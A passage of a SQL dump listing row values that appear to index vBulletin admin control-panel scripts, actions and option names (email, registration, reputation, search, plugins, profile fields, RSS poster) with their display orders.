'needfromemail', 510, 1, 'vbulletin'), (4094, 'options', 'options', 'languageid', 520, 1, 'vbulletin'), (4095, 'options', 'options', 'styleid', 530, 1, 'vbulletin'), (4096, 'options', 'options', 'allowchangestyles', 540, 1, 'vbulletin'), (4097, 'options', 'options', 'cleargifurl', 550, 1, 'vbulletin'), (4098, 'options', 'options', 'storecssasfile', 560, 1, 'vbulletin'), (4099, 'options', 'options', 'usepopups', 570, 1, 'vbulletin'), (4100, 'options', 'options', 'legacypostbit', 575, 1, 'vbulletin'), (4101, 'options', 'options', 'enableemail', 580, 1, 'vbulletin'), (4102, 'options', 'options', 'displayemails', 590, 1, 'vbulletin'), (4103, 'options', 'options', 'secureemail', 600, 1, 'vbulletin'), (4104, 'options', 'options', 'emailfloodtime', 610, 1, 'vbulletin'), (4105, 'options', 'options', 'use_smtp', 611, 1, 'vbulletin'), (4106, 'options', 'options', 'smtp_host', 612, 1, 'vbulletin'), (4107, 'options', 'options', 'smtp_port', 613, 1, 'vbulletin'), (4108, 'options', 'options', 'smtp_user', 614, 1, 'vbulletin'), (4109, 'options', 'options', 'smtp_pass', 615, 1, 'vbulletin'), (4110, 'options', 'options', 'smtp_tls', 616, 1, 'vbulletin'), (4111, 'options', 'options', 'enablecensor', 620, 1, 'vbulletin'), (4112, 'options', 'options', 'censorchar', 630, 1, 'vbulletin'), (4113, 'options', 'options', 'censorwords', 640, 1, 'vbulletin'), (4114, 'options', 'options', 'blankasciistrip', 650, 1, 'vbulletin'), (4115, 'options', 'options', 'allowregistration', 660, 1, 'vbulletin'), (4116, 'options', 'options', 'usecoppa', 670, 1, 'vbulletin'), (4117, 'options', 'options', 'moderatenewmembers', 680, 1, 'vbulletin'), (4118, 'options', 'options', 'regimagecheck', 690, 1, 'vbulletin'), (4119, 'options', 'options', 'welcomemail', 700, 1, 'vbulletin'), (4120, 'options', 'options', 'newuseremail', 710, 1, 'vbulletin'), (4121, 'options', 'options', 'allowmultiregs', 720, 1, 'vbulletin'), (4122, 'options', 'options', 'verifyemail', 730, 1, 'vbulletin'), (4123, 'options', 'options', 'requireuniqueemail', 740, 1, 'vbulletin'), (4124, 'options', 'options', 'minuserlength', 750, 1, 'vbulletin'), (4125, 'options', 'options', 'maxuserlength', 760, 1, 'vbulletin'), (4126, 'options', 'options', 'illegalusernames', 770, 1, 'vbulletin'), (4127, 'options', 'options', 'usernameregex', 771, 1, 'vbulletin'), (4128, 'options', 'options', 'usereferrer', 775, 1, 'vbulletin'), (4129, 'options', 'options', 'defaultregoptions', 780, 1, 'vbulletin'), (4130, 'options', 'options', 'usernamereusedelay', 781, 1, 'vbulletin'), (4131, 'options', 'options', 'social_moderation', 784, 1, 'vbulletin'), (4132, 'options', 'options', 'reqbirthday', 785, 1, 'vbulletin'), (4133, 'options', 'options', 'ctMaxChars', 790, 1, 'vbulletin'), (4134, 'options', 'options', 'ctCensorWords', 800, 1, 'vbulletin'), (4135, 'options', 'options', 'minifriends_amount', 805, 1, 'vbulletin'), (4136, 'options', 'options', 'ctCensorMod', 810, 1, 'vbulletin'), (4137, 'options', 'options', 'friends_per_page', 815, 1, 'vbulletin'), (4138, 'options', 'options', 'profilemaxvisitors', 816, 1, 'vbulletin'), (4139, 'options', 'options', 'softlinebreakchars', 820, 1, 'vbulletin'), (4140, 'options', 'options', 'sigmax', 830, 1, 'vbulletin'), (4141, 'options', 'options', 'allowbbcode', 840, 1, 'vbulletin'), (4142, 'options', 'options', 'allowsmilies', 850, 1, 'vbulletin'), (4143, 'options', 'options', 'allowbbimagecode', 860, 1, 'vbulletin'), (4144, 'options', 'options', 'allowhtml', 870, 1, 'vbulletin'), (4145, 'options', 'options', 'ignoremods', 880, 1, 'vbulletin'), (4146, 'options', 'options', 'avatarenabled', 890, 1, 'vbulletin'), (4147, 'options', 'options', 'numavatarswide', 900, 1, 'vbulletin'), (4148, 'options', 'options', 'numavatarsperpage', 910, 1, 'vbulletin'), (4149, 'options', 'options', 'profilepicenabled', 920, 1, 'vbulletin'), (4150, 'options', 'options', 'reputationenable', 930, 1, 'vbulletin'), (4151, 'options', 'options', 'reputationhide', 940, 1, 'vbulletin'), (4152, 'options', 'options', 'reputationundefined', 945, 1, 'vbulletin'), (4153, 'options', 'options', 'reputationdefault', 950, 1, 'vbulletin'), (4154, 'options', 'options', 'showuserrates', 960, 1, 'vbulletin'), (4155, 'options', 'options', 'adminpower', 970, 1, 'vbulletin'), (4156, 'options', 'options', 'rdpower', 980, 1, 'vbulletin'), (4157, 'options', 'options', 'pcpower', 990, 1, 'vbulletin'), (4158, 'options', 'options', 'kppower', 1000, 1, 'vbulletin'), (4159, 'options', 'options', 'minreputationpost', 1010, 1, 'vbulletin'), (4160, 'options', 'options', 'minreputationcount', 1020, 1, 'vbulletin'), (4161, 'options', 'options', 'maxreputationperday', 1030, 1, 'vbulletin'), (4162, 'options', 'options', 'reputationrepeat', 1040, 1, 'vbulletin'), (4163, 'options', 'options', 'unallowvbcode', 1050, 1, 'vbulletin'), (4164, 'options', 'options', 'unallowsmilies', 1060, 1, 'vbulletin'), (4165, 'options', 'options', 'unallowimg', 1070, 1, 'vbulletin'), (4166, 'options', 'options', 'unallowhtml', 1080, 1, 'vbulletin'), (4167, 'options', 'options', 'enablememberlist', 1090, 1, 'vbulletin'), (4168, 'options', 'options', 'memberlistposts', 1093, 1, 'vbulletin'), (4169, 'options', 'options', 'memberlistfields', 1095, 1, 'vbulletin'), (4170, 'options', 'options', 'memberlistperpage', 1100, 1, 'vbulletin'), (4171, 'options', 'options', 'usememberlistadvsearch', 1110, 1, 'vbulletin'), (4172, 'options', 'options', 'profilelastpost', 1120, 1, 'vbulletin'), (4173, 'options', 'options', 'enablebanning', 1130, 1, 'vbulletin'), (4174, 'options', 'options', 'banip', 1140, 1, 'vbulletin'), (4175, 'options', 'options', 'banemail', 1150, 1, 'vbulletin'), (4176, 'options', 'options', 'aggressiveemailban', 1155, 1, 'vbulletin'), (4177, 'options', 'options', 'allowkeepbannedemail', 1160, 1, 'vbulletin'), (4178, 'options', 'options', 'globalignore', 1170, 1, 'vbulletin'), (4179, 'options', 'options', 'allowedbbcodes', 1173, 1, 'vbulletin'), (4180, 'options', 'options', 'codemaxlines', 1178, 1, 'vbulletin'), (4181, 'options', 'options', 'quickedit', 1179, 1, 'vbulletin'), (4182, 'options', 'options', 'mqlimit', 1180, 1, 'vbulletin'), (4183, 'options', 'options', 'multiquote', 1180, 1, 'vbulletin'), (4184, 'options', 'options', 'quickreply', 1180, 1, 'vbulletin'), (4185, 'options', 'options', 'postminchars', 1200, 1, 'vbulletin'), (4186, 'options', 'options', 'ignorequotechars', 1210, 1, 'vbulletin'), (4187, 'options', 'options', 'titlemaxchars', 1215, 1, 'vbulletin'), (4188, 'options', 'options', 'quotetitle', 1220, 1, 'vbulletin'), (4189, 'options', 'options', 'postmaxchars', 1230, 1, 'vbulletin'), (4190, 'options', 'options', 'maximages', 1240, 1, 'vbulletin'), (4191, 'options', 'options', 'stopshouting', 1250, 1, 'vbulletin'), (4192, 'options', 'options', 'allowdynimg', 1260, 1, 'vbulletin'), (4193, 'options', 'options', 'floodchecktime', 1270, 1, 'vbulletin'), (4194, 'options', 'options', 'editthreadtitlelimit', 1280, 1, 'vbulletin'), (4195, 'options', 'options', 'addpolltimeout', 1290, 1, 'vbulletin'), (4196, 'options', 'options', 'edittimelimit', 1295, 1, 'vbulletin'), (4197, 'options', 'options', 'noeditedbytime', 1300, 1, 'vbulletin'), (4198, 'options', 'options', 'logip', 1310, 1, 'vbulletin'), (4199, 'options', 'options', 'allowvbcodebuttons', 1320, 1, 'vbulletin'), (4200, 'options', 'options', 'editormodes', 1335, 1, 'vbulletin'), (4201, 'options', 'options', 'smtotal', 1340, 1, 'vbulletin'), (4202, 'options', 'options', 'smcolumns', 1350, 1, 'vbulletin'), (4203, 'options', 'options', 'wysiwyg_smtotal', 1360, 1, 'vbulletin'), (4204, 'options', 'options', 'attachtotalspace', 1370, 1, 'vbulletin'), (4205, 'options', 'options', 'attachlimit', 1380, 1, 'vbulletin'), (4206, 'options', 'options', 'attachboxcount', 1390, 1, 'vbulletin'), (4207, 'options', 'options', 'attachurlcount', 1395, 1, 'vbulletin'), (4208, 'options', 'options', 'allowattachdel', 1400, 1, 'vbulletin'), (4209, 'options', 'options', 'allowclosedattachdel', 1401, 1, 'vbulletin'), (4210, 'options', 'options', 'allowduplicates', 1410, 1, 'vbulletin'), (4211, 'options', 'options', 'viewattachedimages', 1420, 1, 'vbulletin'), (4212, 'options', 'options', 'attachthumbs', 1430, 1, 'vbulletin'), (4213, 'options', 'options', 'attachthumbssize', 1440, 1, 'vbulletin'), (4214, 'options', 'options', 'thumbquality', 1445, 1, 'vbulletin'), (4215, 'options', 'options', 'attachrow', 1450, 1, 'vbulletin'), (4216, 'options', 'options', 'maxpolloptions', 1460, 1, 'vbulletin'), (4217, 'options', 'options', 'maxpolllength', 1465, 1, 'vbulletin'), (4218, 'options', 'options', 'updatelastpost', 1470, 1, 'vbulletin'), (4219, 'options', 'options', 'showvotes', 1480, 1, 'vbulletin'), (4220, 'options', 'options', 'votechange', 1490, 1, 'vbulletin'), (4221, 'options', 'options', 'enablesearches', 1500, 1, 'vbulletin'), (4222, 'options', 'options', 'searchfloodtime', 1510, 1, 'vbulletin'), (4223, 'options', 'options', 'minsearchlength', 1520, 1, 'vbulletin'), (4224, 'options', 'options', 'maxsearchlength', 1530, 1, 'vbulletin'), (4225, 'options', 'options', 'goodwords', 1540, 1, 'vbulletin'), (4226, 'options', 'options', 'searchperpage', 1550, 1, 'vbulletin'), (4227, 'options', 'options', 'maxresults', 1560, 1, 'vbulletin'), (4228, 'options', 'options', 'allowwildcards', 1570, 1, 'vbulletin'), (4229, 'options', 'options', 'similarthreadsearch', 1580, 1, 'vbulletin'), (4230, 'options', 'options', 'searchsharing', 1585, 1, 'vbulletin'), (4231, 'options', 'options', 'similarthreadthreshold', 1590, 1, 'vbulletin'), (4232, 'options', 'options', 'badwords', 1595, 1, 'vbulletin'), (4233, 'options', 'options', 'searchimagecheck', 1598, 1, 'vbulletin'), (4234, 'options', 'options', 'multimatchscore', 1600, 1, 'vbulletin'), (4235, 'options', 'options', 'datescore', 1610, 1, 'vbulletin'), (4236, 'options', 'options', 'threadtitlescore', 1620, 1, 'vbulletin'), (4237, 'options', 'options', 'posttitlescore', 1630, 1, 'vbulletin'), (4238, 'options', 'options', 'replyscore', 1640, 1, 'vbulletin'), (4239, 'options', 'options', 'replyfunc', 1650, 1, 'vbulletin'), (4240, 'options', 'options', 'viewscore', 1660, 1, 'vbulletin'), (4241, 'options', 'options', 'viewfunc', 1670, 1, 'vbulletin'), (4242, 'options', 'options', 'ratescore', 1680, 1, 'vbulletin'), (4243, 'options', 'options', 'ratefunc', 1690, 1, 'vbulletin'), (4244, 'options', 'options', 'forumhome', 1700, 1, 'vbulletin'), (4245, 'options', 'options', 'displayloggedin', 1710, 1, 'vbulletin'), (4246, 'options', 'options', 'showbirthdays', 1720, 1, 'vbulletin'), (4247, 'options', 'options', 'birthdaydatecut', 1730, 1, 'vbulletin'), (4248, 'options', 'options', 'showevents', 1740, 1, 'vbulletin'), (4249, 'options', 'options', 'showholidays', 1750, 1, 'vbulletin'), (4250, 'options', 'options', 'showeventtype', 1760, 1, 'vbulletin'), (4251, 'options', 'options', 'activememberdays', 1765, 1, 'vbulletin'), (4252, 'options', 'options', 'activememberoptions', 1767, 1, 'vbulletin'), (4253, 'options', 'options', 'forumhomedepth', 1770, 1, 'vbulletin'), (4254, 'options', 'options', 'forumdisplaydepth', 1780, 1, 'vbulletin'), (4255, 'options', 'options', 'subforumdepth', 1790, 1, 'vbulletin'), (4256, 'options', 'options', 'showforumdescription', 1800, 1, 'vbulletin'), (4257, 'options', 'options', 'showprivateforums', 1805, 1, 'vbulletin'), (4258, 'options', 'options', 'hideprivateforums', 1810, 1, 'vbulletin'), (4259, 'options', 'options', 'showlocks', 1820, 1, 'vbulletin'), (4260, 'options', 'options', 'lastthreadchars', 1830, 1, 'vbulletin'), (4261, 'options', 'options', 'showmoderatorcolumn', 1840, 1, 'vbulletin'), (4262, 'options', 'options', 'nav_forumdesc', 1845, 1, 'vbulletin'), (4263, 'options', 'options', 'showprefixlastpost', 1845, 1, 'vbulletin'), (4264, 'options', 'options', 'showforumusers', 1850, 1, 'vbulletin'), (4265, 'options', 'options', 'maxthreads', 1860, 1, 'vbulletin'), (4266, 'options', 'options', 'showstickies', 1870, 1, 'vbulletin'), (4267, 'options', 'options', 'showdots', 1880, 1, 'vbulletin'), (4268, 'options', 'options', 'usehotthreads', 1890, 1, 'vbulletin'), (4269, 'options', 'options', 'hotnumberviews', 1900, 1, 'vbulletin'), (4270, 'options', 'options', 'hotnumberposts', 1910, 1, 'vbulletin'), (4271, 'options', 'options', 'linktopages', 1920, 1, 'vbulletin'), (4272, 'options', 'options', 'maxmultipage', 1930, 1, 'vbulletin'), (4273, 'options', 'options', 'threadpreview', 1940, 1, 'vbulletin'), (4274, 'options', 'options', 'oneannounce', 1950, 1, 'vbulletin'), (4275, 'options', 'options', 'showthreadusers', 1960, 1, 'vbulletin'), (4276, 'options', 'options', 'maxposts', 1970, 1, 'vbulletin'), (4277, 'options', 'options', 'usermaxposts', 1980, 1, 'vbulletin'), (4278, 'options', 'options', 'showdeficon', 1990, 1, 'vbulletin'), (4279, 'options', 'options', 'wordwrap', 2010, 1, 'vbulletin'), (4280, 'options', 'options', 'threadvoted', 2020, 1, 'vbulletin'), (4281, 'options', 'options', 'threadsubscribed', 2030, 1, 'vbulletin'), (4282, 'options', 'options', 'showsimilarthreads', 2040, 1, 'vbulletin'), (4283, 'options', 'options', 'postelements', 2045, 1, 'vbulletin'), (4284, 'options', 'options', 'allowthreadedmode', 2050, 1, 'vbulletin'), (4285, 'options', 'options', 'threadedmode', 2060, 1, 'vbulletin'), (4286, 'options', 'options', 'threaded_listdepth', 2070, 1, 'vbulletin'), (4287, 'options', 'options', 'threaded_maxcache', 2080, 1, 'vbulletin'), (4288, 'options', 'options', 'threaded_trimtitle', 2085, 1, 'vbulletin'), (4289, 'options', 'options', 'enablepms', 2090, 1, 'vbulletin'), (4290, 'options', 'options', 'checknewpm', 2100, 1, 'vbulletin'), (4291, 'options', 'options', 'pmmaxchars', 2110, 1, 'vbulletin'), (4292, 'options', 'options', 'pmfloodtime', 2120, 1, 'vbulletin'), (4293, 'options', 'options', 'pmperpage', 2130, 1, 'vbulletin'), (4294, 'options', 'options', 'pmmaxperpage', 2140, 1, 'vbulletin'), (4295, 'options', 'options', 'privallowicons', 2150, 1, 'vbulletin'), (4296, 'options', 'options', 'privallowbbcode', 2160, 1, 'vbulletin'), (4297, 'options', 'options', 'privallowsmilies', 2170, 1, 'vbulletin'), (4298, 'options', 'options', 'privallowbbimagecode', 2180, 1, 'vbulletin'), (4299, 'options', 'options', 'privallowhtml', 2190, 1, 'vbulletin'), (4300, 'options', 'options', 'WOLenable', 2200, 1, 'vbulletin'), (4301, 'options', 'options', 'WOLrefresh', 2210, 1, 'vbulletin'), (4302, 'options', 'options', 'WOLguests', 2220, 1, 'vbulletin'), (4303, 'options', 'options', 'WOLresolve', 2230, 1, 'vbulletin'), (4304, 'options', 'options', 'enablespiders', 2240, 1, 'vbulletin'), (4305, 'options', 'options', 'archiveenabled', 2270, 1, 'vbulletin'), (4306, 'options', 'options', 'archive_threadtype', 2275, 1, 'vbulletin'), (4307, 'options', 'options', 'archive_threadsperpage', 2280, 1, 'vbulletin'), (4308, 'options', 'options', 'archive_postsperpage', 2290, 1, 'vbulletin'), (4309, 'options', 'options', 'adminquickstats', 2300, 1, 'vbulletin'), (4310, 'options', 'options', 'cpstylefolder', 2310, 1, 'vbulletin'), (4311, 'options', 'options', 'timeoutcontrolpanel', 2320, 1, 'vbulletin'), (4312, 'options', 'options', 'cp_collapse_forums', 2330, 1, 'vbulletin'), (4313, 'options', 'options', 'cp_usereditcolumns', 2340, 1, 'vbulletin'), (4314, 'options', 'options', 'externaljs', 2350, 1, 'vbulletin'), (4315, 'options', 'options', 'externalrss', 2360, 1, 'vbulletin'), (4316, 'options', 'options', 'externalxml', 2370, 1, 'vbulletin'), (4317, 'options', 'options', 'externalcutoff', 2375, 1, 'vbulletin'), (4318, 'options', 'options', 'errorlogdatabase', 2380, 1, 'vbulletin'), (4319, 'options', 'options', 'errorlogsecurity', 2390, 1, 'vbulletin'), (4320, 'options', 'options', 'errorlogphp', 2395, 1, 'vbulletin'), (4321, 'options', 'options', 'errorlogmaxsize', 2400, 1, 'vbulletin'), (4322, 'options', 'options', 'disableerroremail', 2410, 1, 'vbulletin'), (4323, 'options', 'options', 'enablehooks', 2470, 1, 'vbulletin'), (4324, 'options', 'options', 'usercss_allowed_font_sizes', 2610, 1, 'vbulletin'), (4325, 'options', 'options', 'usercss_allowed_border_widths', 2620, 1, 'vbulletin'), (4326, 'options', 'options', 'vm_maxchars', 2700, 1, 'vbulletin'), (4327, 'options', 'options', 'vm_perpage', 2720, 1, 'vbulletin'), (4328, 'options', 'options', 'vm_maxperpage', 2730, 1, 'vbulletin'), (4329, 'options', 'options', 'vm_moderation', 2740, 1, 'vbulletin'), (4330, 'options', 'searchtype', '', 1, 1, 'vbulletin'), (4331, 'options', 'searchtype', 'deleteindex', 10, 1, 'vbulletin'), (4332, 'passwordcheck', 'check', 'do_banned', 1, 1, 'vbulletin'), (4333, 'passwordcheck', 'check', 'email', 1, 1, 'vbulletin'), (4334, 'passwordcheck', 'check', 'email_from', 1, 1, 'vbulletin'), (4335, 'passwordcheck', 'check', 'email_subject', 1, 1, 'vbulletin'), (4336, 'passwordcheck', 'check', 'languageid', 1, 1, 'vbulletin'), (4337, 'passwordcheck', 'check', 'period', 1, 1, 'vbulletin'), (4338, 'passwordcheck', 'check', 'quantity', 1, 1, 'vbulletin'), (4339, 'passwordcheck', 'check', 'reset_on_error', 1, 1, 'vbulletin'), (4340, 'phrase', '', '', 1, 1, 'vbulletin'), (4341, 'phrase', 'add', '', 1, 1, 'vbulletin'), (4342, 'phrase', 'add,edit', 'phrasetypeid', 20, 1, 'vbulletin'), (4343, 'phrase', 'add,edit', 'varname', 30, 1, 'vbulletin'), (4344, 'phrase', 'add,edit', 'text', 40, 1, 'vbulletin'), (4345, 'phrase', 'delete', '', 1, 1, 'vbulletin'), (4346, 'phrase', 'edit', '', 1, 1, 'vbulletin'), (4347, 'phrase', 'edit', 'languageid', 10, 1, 'vbulletin'), (4348, 'phrase', 'findorphans', '', 1, 1, 'vbulletin'), (4349, 'phrase', 'findupdates', '', 1, 1, 'vbulletin'), (4350, 'phrase', 'manageorphans', '', 1, 1, 'vbulletin'), (4351, 'phrase', 'modify', '', 1, 1, 'vbulletin'), (4352, 'phrase', 'quickref', '', 1, 1, 'vbulletin'), (4353, 'phrase', 'search', '', 1, 1, 'vbulletin'), (4354, 'phrase', 'search', 'searchstring', 20, 1, 'vbulletin'), (4355, 'phrase', 'search', 'languageid', 25, 1, 'vbulletin'), (4356, 'phrase', 'search', 'searchwhere', 30, 1, 'vbulletin'), (4357, 'phrase', 'search', 'casesensitive', 40, 1, 'vbulletin'), (4358, 'phrase', 'search', 'replacestring', 50, 1, 'vbulletin'), (4359, 'plugin', 'productadd', 'allowoverwrite', 4, 1, 'vbulletin'), (4360, 'plugin', 'productadd,productedit', 'productid', 5, 1, 'vbulletin'), (4361, 'plugin', 'productadd,productedit', 'title', 10, 1, 'vbulletin'), (4362, 'plugin', 'productadd,productedit', 'version', 20, 1, 'vbulletin'), (4363, 'plugin', 'productadd,productedit', 'description', 30, 1, 'vbulletin'), (4364, 'plugin', 'productadd,productedit', 'url', 40, 1, 'vbulletin'), (4365, 'plugin', 'productadd,productedit', 'versioncheckurl', 50, 1, 'vbulletin'), (4366, 'plugin', 'productedit', 'dependencytype', 60, 1, 'vbulletin'), (4367, 'plugin', 'productedit', 'maxversion', 70, 1, 'vbulletin'), (4368, 'plugin', 'productedit', 'minversion', 80, 1, 'vbulletin'), (4369, 'plugin', 'productedit', 'installcode', 90, 1, 'vbulletin'), (4370, 'plugin', 'productedit', 'uninstallcode', 100, 1, 'vbulletin'), (4371, 'prefix', 'addprefix,editprefix', 'prefixid', 1, 1, 'vbulletin'), (4372, 'prefix', 'addprefix,editprefix', 'prefixsetid', 10, 1, 'vbulletin'), (4373, 'prefix', 'addprefix,editprefix', 'title_plain', 20, 1, 'vbulletin'), (4374, 'prefix', 'addprefix,editprefix', 'title_rich', 30, 1, 'vbulletin'), (4375, 'prefix', 'addprefix,editprefix', 'displayorder', 40, 1, 'vbulletin'), (4376, 'prefix', 'addset,editset', 'prefixsetid', 1, 1, 'vbulletin'), (4377, 'prefix', 'addset,editset', 'title', 10, 1, 'vbulletin'), (4378, 'prefix', 'addset,editset', 'forumids', 20, 1, 'vbulletin'), (4379, 'prefix', 'addset,editset', 'displayorder', 30, 1, 'vbulletin'), (4380, 'prefix', 'list', '', 1, 1, 'vbulletin'), (4381, 'profilefield', '', '', 1, 1, 'vbulletin'), (4382, 'profilefield', 'add', '', 1, 1, 'vbulletin'), (4383, 'profilefield', 'add', 'profilefieldtype', 1, 1, 'vbulletin'), (4384, 'profilefield', 'add,edit', 'title', 20, 1, 'vbulletin'), (4385, 'profilefield', 'add,edit', 'description', 30, 1, 'vbulletin'), (4386, 'profilefield', 'add,edit', 'profilefieldcategoryid', 35, 1, 'vbulletin'), (4387, 'profilefield', 'add,edit', 'data', 40, 1, 'vbulletin'), (4388, 'profilefield', 'add,edit', 'maxlength', 50, 1, 'vbulletin'), (4389, 'profilefield', 'add,edit', 'size', 60, 1, 'vbulletin'), (4390, 'profilefield', 'add,edit', 'newtype', 65, 1, 'vbulletin'), (4391, 'profilefield', 'add,edit', 'height', 70, 1, 'vbulletin'), (4392, 'profilefield', 'add,edit', 'def', 120, 1, 'vbulletin'), (4393, 'profilefield', 'add,edit', 'perline', 140, 1, 'vbulletin'), (4394, 'profilefield', 'add,edit', 'boxheight', 150, 1, 'vbulletin'), (4395, 'profilefield', 'add,edit', 'displayorder', 160, 1, 'vbulletin'), (4396, 'profilefield', 'add,edit', 'required', 170, 1, 'vbulletin'), (4397, 'profilefield', 'add,edit', 'editable', 175, 1, 'vbulletin'), (4398, 'profilefield', 'add,edit', 'hidden', 180, 1, 'vbulletin'), (4399, 'profilefield', 'add,edit', 'searchable', 190, 1, 'vbulletin'), (4400, 'profilefield', 'add,edit', 'memberlist', 200, 1, 'vbulletin'), (4401, 'profilefield', 'add,edit', 'optional', 210, 1, 'vbulletin'), (4402, 'profilefield', 'add,edit', 'regex', 240, 1, 'vbulletin'), (4403, 'profilefield', 'add,edit', 'form', 250, 1, 'vbulletin'), (4404, 'profilefield', 'edit', '', 1, 1, 'vbulletin'), (4405, 'profilefield', 'editcat', '', 1, 1, 'vbulletin'), (4406, 'profilefield', 'editcat', 'allowprivacy', 1, 1, 'vbulletin'), (4407, 'profilefield', 'editcat', 'title', 1, 1, 'vbulletin'), (4408, 'profilefield', 'editcat', 'desc', 2, 1, 'vbulletin'), (4409, 'profilefield', 'editcat', 'location', 3, 1, 'vbulletin'), (4410, 'profilefield', 'editcat', 'displayorder', 4, 1, 'vbulletin'), (4411, 'profilefield', 'modify', '', 1, 1, 'vbulletin'), (4412, 'profilefield', 'remove', '', 1, 1, 'vbulletin'), (4413, 'queries', '', '', 1, 1, 'vbulletin'), (4414, 'queries', 'modify', '', 1, 1, 'vbulletin'), (4415, 'queries', 'modify', 'autoquery', 10, 1, 'vbulletin'), (4416, 'queries', 'modify', 'query', 20, 1, 'vbulletin'), (4417, 'queries', 'modify', 'perpage', 30, 1, 'vbulletin'), (4418, 'ranks', '', '', 1, 1, 'vbulletin'), (4419, 'ranks', 'add', '', 1, 1, 'vbulletin'), (4420, 'ranks', 'add,edit', 'ranklevel', 10, 1, 'vbulletin'), (4421, 'ranks', 'add,edit', 'minposts', 20, 1, 'vbulletin'), (4422, 'ranks', 'add,edit', 'usergroupid', 30, 1, 'vbulletin'), (4423, 'ranks', 'add,edit', 'rankimg', 40, 1, 'vbulletin'), (4424, 'ranks', 'add,edit', 'rankhtml', 50, 1, 'vbulletin'), (4425, 'ranks', 'add,edit', 'stack', 60, 1, 'vbulletin'), (4426, 'ranks', 'add,edit', 'display', 70, 1, 'vbulletin'), (4427, 'ranks', 'edit', '', 1, 1, 'vbulletin'), (4428, 'ranks', 'modify', '', 1, 1, 'vbulletin'), (4429, 'ranks', 'remove', '', 1, 1, 'vbulletin'), (4430, 'repair', '', '', 1, 1, 'vbulletin'), (4431, 'repair', 'list', '', 1, 1, 'vbulletin'), (4432, 'repair', 'list', 'optimizetables', 1, 1, 'vbulletin'), (4433, 'repair', 'list', 'repairtables', 1, 1, 'vbulletin'), (4434, 'replacement', '', '', 1, 1, 'vbulletin'), (4435, 'replacement', 'add', '', 1, 1, 'vbulletin'), (4436, 'replacement', 'add', 'dostyleid', 10, 1, 'vbulletin'), (4437, 'replacement', 'add,edit', 'findtext', 20, 1, 'vbulletin'), (4438, 'replacement', 'add,edit', 'replacetext', 30, 1, 'vbulletin'), (4439, 'replacement', 'edit', '', 1, 1, 'vbulletin'), (4440, 'replacement', 'modify', '', 1, 1, 'vbulletin'), (4441, 'replacement', 'remove', '', 1, 1, 'vbulletin'), (4442, 'resources', '', '', 1, 1, 'vbulletin'), (4443, 'resources', 'index', '', 1, 1, 'vbulletin'), (4444, 'resources', 'index', 'forumid', 10, 1, 'vbulletin'), (4445, 'resources', 'index', 'usergroupid', 20, 1, 'vbulletin'), (4446, 'resources', 'view', '', 1, 1, 'vbulletin'), (4447, 'resources', 'viewuser', '', 1, 1, 'vbulletin'), (4448, 'rssposter', 'edit', 'resetlastrun', 10, 1, 'vbulletin'), (4449, 'rssposter', 'edit', 'enabled', 20, 1, 'vbulletin'), (4450, 'rssposter', 'edit', 'title', 30, 1, 'vbulletin'), (4451, 'rssposter', 'edit', 'url', 40, 1, 'vbulletin'), (4452, 'rssposter', 'edit', 'ttl', 50, 1, 'vbulletin'), (4453, 'rssposter', 'edit', 'maxresults', 60, 1, 'vbulletin'), (4454, 'rssposter', 'edit', 'searchwords', 70, 1, 'vbulletin'), (4455, 'rssposter', 'edit', 'username', 80, 1, 'vbulletin'), (4456, 'rssposter', 'edit', 'forumid', 90, 1, 'vbulletin'), (4457, 'rssposter', 'edit', 'allowsmilies', 100, 1, 'vbulletin'), (4458, 'rssposter', 'edit', 'showsignature', 110, 1, 'vbulletin'), (4459, 'rssposter', 'edit', 'html2bbcode', 115, 1, 'vbulletin'), (4460, 'rssposter', 'edit', 'titletemplate', 120, 1, 'vbulletin'), (4461, 'rssposter', 'edit', 'bodytemplate', 130, 1, 'vbulletin'), (4462, 'rssposter', 'edit', 'itemtype', 140, 1, 'vbulletin'), (4463, 'rssposter', 'edit', 'prefixid', 145, 1, 'vbulletin'), (4464, 'rssposter', 'edit', 'iconid', 150, 1, 'vbulletin'), (4465, 'rssposter', 'edit', 'stickthread', 160, 1, 'vbulletin'), (4466, 'rssposter', 'edit', 'moderatethread', 170, 1, 'vbulletin'), (4467, 'rssposter', 'edit', 'threadactiondelay', 180, 1, 'vbulletin'), (4468, 'rssposter', 'edit', 'unstickthread', 190, 1, 'vbulletin'), (4469, 'rssposter', 'edit', 'closethread', 200, 1, 'vbulletin'), (4470, 'rssposter', 'edit', 'allowhtml', 210, 1, 'vbulletin'), (4471, 'rssposter', 'edit', 'endannouncement', 220, 1, 'vbulletin'), (4472, 'socialgroup_icon', 'switchtype', 'groupiconpath', 1, 1, 'vbulletin'), (4473, 'socialgroup_icon', 'switchtype', 'groupiconurl', 1, 1, 'vbulletin'), (4474, 'socialgroups', 'editcategory', 'description', 1, 1, 'vbulletin'), (4475, 'socialgroups', 'editcategory', 'displayorder', 1, 1, 'vbulletin'), (4476, 'socialgroups', 'editcategory', 'title', 1, 1, 'vbulletin'), (4477, 'socialgroups', 'search', 'category', 1, 1, 'vbulletin'), (4478, 'socialgroups', 'search', 'creator', 1, 1, 'vbulletin'), (4479, 'socialgroups', 'search', 'date_gteq', 1, 1, 'vbulletin'), (4480, 'socialgroups', 'search', 'date_lteq', 1, 1, 'vbulletin'), (4481, 'socialgroups', 'search', 'filtertext', 1, 1, 'vbulletin'), (4482, 'socialgroups', 'search', 'members_gteq', 1, 1, 'vbulletin'), (4483, 'socialgroups', 'search', 'members_lteq', 1, 1, 'vbulletin'), (4484, 'socialgroups', 'search', 'type', 1, 1, 'vbulletin'), (4485, 'stats', '', '', 1, 1, 'vbulletin'), (4486, 'stats', 'index', '', 1, 1, 'vbulletin'), (4487, 'stats', 'reg,activity,thread,post', '', 1, 1, 'vbulletin'), (4488, 'stats', 'reg,activity,thread,post', 'start', 10, 1, 'vbulletin'), (4489, 'stats', 'reg,activity,thread,post', 'end', 20, 1, 'vbulletin'), (4490, 'stats', 'reg,activity,thread,post', 'scope', 30, 1, 'vbulletin'), (4491, 'stats', 'reg,activity,thread,post', 'sort', 40, 1, 'vbulletin'), (4492, 'stats', 'reg,activity,thread,post', 'nullvalue', 50, 1, 'vbulletin'), (4493, 'stats', 'top', '', 1, 1, 'vbulletin'), (4494, 'subscriptionpermission', '', '', 1, 1, 'vbulletin'), (4495, 'subscriptionpermission', 'edit', '', 1, 1, 'vbulletin'), (4496, 'subscriptionpermission', 'edit', 'usesub', 10, 1, 'vbulletin'), (4497, 'subscriptionpermission', 'modify', '', 1, 1, 'vbulletin'), (4498, 'subscriptions', '', '', 1, 1, 'vbulletin'), (4499, 'subscriptions', 'add', '', 1, 1, 'vbulletin'), (4500, 'subscriptions', 'add', 'varname', 1, 1, 'vbulletin'), (4501, 'subscriptions', 